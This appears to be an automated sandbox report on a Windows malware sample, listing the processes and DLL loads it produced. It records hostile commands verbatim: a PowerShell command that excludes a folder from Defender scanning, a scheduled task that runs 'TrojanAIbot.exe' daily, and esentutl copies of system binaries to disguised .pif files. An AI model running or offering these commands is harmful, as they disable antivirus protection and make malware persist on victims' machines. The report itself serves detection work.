Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\timeout.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\timeout.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: url.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: spp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: vssapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: vsstrace.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winhttpcom.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??????????.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??????????.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??????????.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ????.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???e???????????.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???e???????????.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: tquery.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: cryptdll.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppwmi.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppcext.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winscard.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mpr.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ntmarta.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: edputil.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: urlmon.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: srvcli.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: appresolver.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: bcp47langs.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: slc.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll
